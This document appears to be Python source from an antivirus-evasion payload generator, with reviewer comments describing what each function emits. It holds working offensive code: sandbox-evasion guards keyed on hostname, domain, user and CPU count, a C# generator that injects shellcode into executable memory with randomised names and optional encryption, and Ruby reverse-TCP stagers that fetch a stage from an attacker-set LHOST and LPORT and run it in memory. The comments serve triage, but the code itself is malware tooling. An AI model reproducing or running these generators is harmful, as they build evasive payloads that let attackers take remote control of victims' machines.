# num_tabs_required by one; the caller is expected to emit the matching
# closers ('end', '}', or dedent) itself. Unknown languages return ('', 0).
# All randomised identifiers come from evasion_helpers.randomString().
#
# What the emitted conditionals actually test, per option:
#   EXPIRE_PAYLOAD  python: datetime.now() < generation date + N days
#                   (the date is baked in as a "%y-%m-%d" string);
#                   ruby: Date.today < Date.parse(<generation date>).next_day(N);
#                   cs: both sides are computed at run time
#                   (Today and Today.AddDays(N)) and the test is
#                   `Expire < Today`, so no generation date is encoded.
#                   Not emitted for perl/powershell/go.
#   HOSTNAME        substring match, lower-cased, on platform.node() /
#                   Socket.gethostname / Sys::Hostname / MachineName /
#                   os.Hostname; powershell uses -eq on $env:computername.
#   DOMAIN          python: socket.getfqdn(); perl: Net::Domain hostdomain();
#                   powershell: Win32_ComputerSystem.Domain -eq value;
#                   ruby: tested against Socket.gethostname, i.e. a second
#                   hostname substring match; cs: the configured value is not
#                   used at all, the test is MachineName != UserDomainName.
#                   Not emitted for go (rand_domain is generated but unused).
#   PROCESSORS      count >= value (python multiprocessing.cpu_count(),
#                   perl $ENV{NUMBER_OF_PROCESSORS}, powershell
#                   Win32_Processor.NumberOfLogicalProcessors -ge, go
#                   runtime.NumCPU()); cs uses ProcessorCount > value.
#   USERNAME        substring match, lower-cased, except cs, which splits
#                   WindowsIdentity.GetCurrent().Name on '\' and does a
#                   case-sensitive Contains on the part after it, and
#                   powershell, which uses -eq on $env:username.
# go only: a failing user.Current() / os.Hostname() emits os.Exit(1).
#
# NOTE(review): the python branch emits its imports (datetime, platform,
# socket, multiprocessing, getpass) at the current nesting depth, inline with
# the checks. Only identifier names vary between generated samples; the
# library/API call names listed above are fixed strings, which is the useful
# signal when triaging output of this generator. A payload built with these
# options stays inert in any environment that does not satisfy every
# configured guard.
def senecas_games(evasion_payload): # Start checks to determine language # Define original values of variables num_tabs_required = 0 check_code = '' if evasion_payload.language == 'python': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower( ) != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int( evasion_payload.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code check_code += '\t' * num_tabs_required + 'from datetime import datetime\n' check_code += '\t' * num_tabs_required + 'from datetime import date\n' check_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' check_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' check_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import platform\n' check_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options[ "HOSTNAME"][0].lower( ) + '\" in ' + rand_hostname + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import socket\n' check_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options[ "DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = 
evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import multiprocessing\n' check_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' check_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + evasion_payload.required_options[ "PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import getpass\n' check_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' check_code += '\t' * num_tabs_required + 'if \'' + evasion_payload.required_options[ "USERNAME"][0].lower( ) + '\' in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'ruby': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower( ) != "x": year = date.today().year month = date.today().month day = date.today().day # Create Payload code check_code += 'require \'date\'\n' check_code += 'if Date.today < Date.parse(\'' + year + '-' + month + '-' + day + '\').next_day(' + evasion_payload.required_options[ "EXPIRE_PAYLOAD"][0] + ')\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'hostname = Socket.gethostname.downcase\n' check_code += 'if hostname[\"' + evasion_payload.required_options[ "HOSTNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'domain = Socket.gethostname.downcase\n' check_code += 'if domain[\"' + evasion_payload.required_options[ "DOMAIN"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if 
evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += 'name = ENV["USERNAME"].downcase\n' check_code += 'if name[\"' + evasion_payload.required_options[ "USERNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'perl': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'Use Sys::Hostname;\n' check_code += '\t' * num_tabs_required + 'my $' + rand_hostname + ' = hostname;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_hostname + '), lc(' + evasion_payload.required_options[ "HOSTNAME"][0] + ')) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_name + ' = Win32::LoginName;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_name + '), lc(\"' + evasion_payload.required_options[ "USERNAME"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'use Net::Domain qw (hostdomain);\n' check_code += '\t' * num_tabs_required + 'my $' + rand_domain + ' = hostdomain();\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_domain + '), lc(\"' + evasion_payload.required_options[ "DOMAIN"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_corecount = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_corecount + ' = $ENV{\"NUMBER_OF_PROCESSORS\"};' check_code += '\t' * num_tabs_required + 'if ($' + rand_corecount + ' >= 
' + evasion_payload.required_options[ "PROCESSORS"][0] + '){\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'powershell': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += "if($env:computername -eq \"" + evasion_payload.required_options[ "HOSTNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_ComputerSystem).Domain -eq \"" + evasion_payload.required_options[ "DOMAIN"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += "if($env:username -eq \"" + evasion_payload.required_options[ "USERNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_Processor).NumberOfLogicalProcessors -ge " + evasion_payload.required_options[ "PROCESSORS"][0].lower() + ") {\n" num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'cs': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower( ) != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code check_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format( RandToday) check_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, evasion_payload.required_options["EXPIRE_PAYLOAD"][0]) check_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( 
evasion_payload.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( evasion_payload.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) check_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) check_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, evasion_payload.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'go': rand_username = evasion_helpers.randomString() rand_error1 = evasion_helpers.randomString() rand_hostname = evasion_helpers.randomString() rand_error2 = evasion_helpers.randomString() rand_processor = evasion_helpers.randomString() rand_domain = evasion_helpers.randomString() if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += rand_username + ", " + rand_error1 + " := user.Current()\n" check_code += "if " + rand_error1 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options[ 
"USERNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n" check_code += "if " + rand_error2 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options[ "HOSTNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += rand_processor + " := runtime.NumCPU()\n" check_code += "if " + rand_processor + " >= " + evasion_payload.required_options[ "PROCESSORS"][0] + " {\n" num_tabs_required += 1 # Return check information return check_code, num_tabs_required else: return '', 0
# generate(self) -> None   (C# shellcode-injection source generator)
#
# Assembles C# source text and stores it in self.payload_source_code; the
# return value is always None. Steps, in the order the code performs them:
#  1. Shellcode: unless self.cli_shellcode is set, it is produced by
#     self.shellcode.generate(self.cli_opts) and self.payload_type is set
#     from msfvenompayload / payload_choice / 'custom'. The escaped text form
#     ("\x41\x42...") is turned into a C# array-initialiser body
#     ("0x41,0x42,...") by splitting on the backslash and re-joining with ",0".
#  2. Names: namespace, class, locals and every DllImport parameter are
#     evasion_helpers.randomString(). r[] holds the 12 parameter names for the
#     "virtual" imports (VirtualAlloc/CreateThread/WaitForSingleObject), y[]
#     the 17 for the "heap" imports (HeapCreate/HeapAlloc/RtlMoveMemory/
#     CreateThread/WaitForSingleObject). The kernel32 entry-point names
#     themselves are fixed strings.
#  3. Main() opens at num_tabs_required = 2 (namespace + class). The
#     EXPIRE_PAYLOAD / HOSTNAME / DOMAIN / PROCESSORS / USERNAME guards are
#     emitted inline here (same text as the 'cs' branch of
#     gamemaker.senecas_games, which this method does not call); each opened
#     `if` adds one to num_tabs_required. As written: the EXPIRE guard
#     compares DateTime.Today with Today.AddDays(N) at run time and tests
#     `Expire < Today` (no generation date is encoded); DOMAIN ignores the
#     configured value and tests MachineName != UserDomainName; PROCESSORS
#     uses `>`; USERNAME is a case-sensitive Contains on the part of
#     WindowsIdentity.GetCurrent().Name after the backslash.
#  4. Injection body. "virtual": VirtualAlloc(0, len, 0x1000, 0x40) ->
#     Marshal.Copy -> CreateThread -> WaitForSingleObject(.., 0xFFFFFFFF).
#     "heap": HeapCreate(0x00040000, len, 0) -> HeapAlloc(heap, 0x00000008,
#     len) -> RtlMoveMemory -> CreateThread -> WaitForSingleObject(0xFFFFFFFF).
#     0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE (see the
#     commented-out constants line in the virtual branch); the heap flags
#     presumably are HEAP_CREATE_ENABLE_EXECUTE / HEAP_ZERO_MEMORY - confirm
#     against the Win32 documentation. Main's own closing brace is written
#     on the WaitForSingleObject line.
#  5. The while loop appends one '}' per remaining nesting level (guards,
#     class, namespace). If USE_ARYA == "y" the finished text is passed
#     through encryption.arya().
#
# NOTE(review): across generated samples only identifiers change; the P/Invoke
# names, the RWX allocation constants and the brace structure are constant.
# The virtual branch writes its byte[] and call lines without the
# '\t' * num_tabs_required prefix the heap branch uses (whitespace only).
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) # randomize all our variable names, yo' namespaceName = evasion_helpers.randomString() className = evasion_helpers.randomString() bytearrayName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % (namespaceName, className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); 
\n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "static void Main() {\n" num_tabs_required += 2 if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if 
self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "byte[] %s = {%s};" % (bytearrayName, Shellcode) payload_code += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, bytearrayName) payload_code += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( bytearrayName, funcAddrName, bytearrayName) payload_code += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % ( hThreadName) # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' 
* num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
# generate(self) -> None   (Ruby reverse-TCP stager, guards emitted inline)
#
# Builds Ruby source into self.payload_source_code; returns None.
#  - Preamble: require rubygems / win32/api / socket, include Win32. When
#    EXPIRE_PAYLOAD, HOSTNAME, DOMAIN and USERNAME are all "X" it also emits
#    `exit if Object.const_defined?(:Ocra)` - presumably so the script does
#    not execute while being packaged by Ocra; the author's own comment calls
#    this a workaround, so confirm before relying on it. These two conditions
#    compare against the upper-case sentinel "X" only, whereas the guard
#    conditions below lower-case the option first.
#  - Environment guards are written here directly (this variant does not
#    call gamemaker.senecas_games). num_ends_required counts the opened `if`s
#    and the final loop appends that many `end` lines. The EXPIRE guard is
#    Date.today < Date.parse(<generation date>).next_day(N); HOSTNAME and
#    DOMAIN are both substring matches on Socket.gethostname.downcase (so
#    DOMAIN is a second hostname test); USERNAME matches ENV["USERNAME"].
#  - Win32 bindings are Ruby globals ($<random>) created with
#    API.new('VirtualAlloc','IIII','I') etc.; the DLL function-name strings
#    are fixed, only the global names vary. payloadName and threadName are
#    generated but never referenced here.
#  - g(ip, port): TCPSocket.open to LHOST:LPORT, reads a 4-byte 'L'
#    (32-bit unsigned) length, then receives until p reaches that length.
#    p starts as a single space; afterwards p[0] is replaced with 0xBF and
#    p[1..4] with the socket's OS handle from msvcrt _get_osfhandle(s.fileno)
#    packed 'V' (little-endian), so the first four received bytes are
#    overwritten. Any exception hits the bare rescue and returns "".
#  - ij(sc): acts only when sc.length > 1000 (the "" from a failed g() is a
#    no-op). "virtual": VirtualAlloc(0, max(len, 0x1000), 0x1000, 0x40) ->
#    RtlMoveMemory -> CreateThread -> WaitForSingleObject. "heap":
#    HeapCreate(0x0004, max(len, 0x1000), 0) -> HeapAlloc(heap, 0x00000008,
#    len) -> RtlMoveMemory -> CreateThread -> WaitForSingleObject. The wait
#    timeout is written 0xFFFFFFF (seven Fs), not the 0xFFFFFFFF the C#
#    generator uses, and the HeapCreate flag (0x0004) also differs from the
#    C# generator's 0x00040000.
#  - Entry: ij(g("LHOST",LPORT)) with the configured options. This line has
#    no trailing newline, so the first `end` closer lands on the same line.
#
# NOTE(review): the 4-byte length prefix followed by the stage, and the fixed
# kernel32/msvcrt API names, are constant across samples; randomisation
# covers only the Ruby global names.
def generate(self): # How I'm tracking the number of nested tabs needed # to make the payload num_ends_required = 0 payload_code = '' payload_code += "require 'rubygems';require 'win32/api';require 'socket';include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["EXPIRE_PAYLOAD"][0] != "X" or self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X": payload_code += 'require \'socket\'\n' if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": year = date.today().year month = date.today().month day = date.today().day # Create Payload code payload_code += 'require \'date\'\n' payload_code += 'if Date.today < Date.parse(\'' + year + '-' + month + '-' + day + '\').next_day(' + self.required_options["EXPIRE_PAYLOAD"][0] + ')\n' # Add a tab for this check num_ends_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += 'hostname = Socket.gethostname.downcase\n' payload_code += 'if hostname[\"' + self.required_options["HOSTNAME"][0].lower() + '\"]\n' # Add a tab for this check num_ends_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += 'domain = Socket.gethostname.downcase\n' payload_code += 'if domain[\"' + self.required_options["DOMAIN"][0].lower() + '\"]\n' # Add a tab for this check num_ends_required += 1 if self.required_options["USERNAME"][0].lower() != "x": payload_code += 'name = ENV["USERNAME"].downcase\n' payload_code += 'if name[\"' + self.required_options["USERNAME"][0].lower() + '\"]\n' # Add a tab for this check num_ends_required += 1 # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() 
threadName = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n" payload_code += "def g(ip,port)\n" payload_code += "\tbegin\n" payload_code += "\t\ts = TCPSocket.open(ip, port)\n" payload_code += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n" payload_code += "\t\tp = \" \"\n" payload_code += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n" payload_code += "\t\tp[0] = ['BF'].pack(\"H*\")\n" payload_code += "\t\tsd = $g_o.call(s.fileno)\n" payload_code += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n" payload_code += "\t\treturn p\n" payload_code += "\trescue\n\treturn \"\"\n\tend\nend\n" payload_code += "def ij(sc)\n" payload_code += "\tif sc.length > 1000\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? 
sc.length : 0x1000), 0x1000, 0x40)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n" payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n" payload_code += "\tend\nend\n" payload_code += "ij(g(\"%s\",%s))" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
# generate(self) -> None   (Ruby reverse-TCP stager, guards from gamemaker)
#
# Builds Ruby source into self.payload_source_code; returns None.
#  - Preamble: require rubygems / win32/api / socket, include Win32. When
#    HOSTNAME, DOMAIN, USERNAME and SLEEP are all "X" (note: SLEEP, not
#    EXPIRE_PAYLOAD, is part of this condition) it emits
#    `exit if Object.const_defined?(:Ocra)` - presumably to stay inert while
#    Ocra packages the script; the author's comment calls it a workaround.
#    An extra `require 'socket'` is added when HOSTNAME or DOMAIN is set.
#    Both conditions compare against the upper-case "X" sentinel only.
#  - Guard text and the number of `end` closers come from
#    gamemaker.senecas_games(self) as (payload_code2, num_ends_required)
#    and are appended to the preamble. The ruby branch of that helper may
#    emit its own `require 'socket'`; a repeated require is harmless in Ruby.
#  - Win32 bindings are Ruby globals ($<random>) created with API.new for
#    VirtualAlloc/RtlMoveMemory/CreateThread/WaitForSingleObject ("virtual")
#    or HeapCreate/HeapAlloc plus the same three ("heap"); the function-name
#    strings are fixed. payloadName and threadName are generated but unused.
#  - g(ip, port): TCPSocket.open to LHOST:LPORT, 4-byte 'L' length prefix,
#    receive loop until p (which starts as one space) reaches that length,
#    then p[0] := 0xBF and p[1..4] := the socket's OS handle from msvcrt
#    _get_osfhandle(s.fileno) packed 'V', overwriting the first four received
#    bytes. Bare rescue returns "".
#  - ij(sc): only when sc.length > 1000. "virtual": VirtualAlloc(0,
#    max(len, 0x1000), 0x1000, 0x40) -> RtlMoveMemory -> CreateThread ->
#    WaitForSingleObject(.., 0xFFFFFFF). "heap": HeapCreate(0x0004, ..., 0)
#    -> HeapAlloc(heap, 0x00000008, len) -> RtlMoveMemory -> CreateThread ->
#    WaitForSingleObject(.., 0xFFFFFFF). The timeout literal has seven Fs,
#    not the 0xFFFFFFFF used by the C# generator.
#  - Entry: ij(g("LHOST",LPORT)) followed by "\n", then one `end` per
#    num_ends_required.
#
# NOTE(review): only the $<random> global names vary between samples; the
# API name strings, the constants (0x1000, 0x40, 0x0004, 0x00000008,
# 0xFFFFFFF) and the length-prefixed receive are fixed.
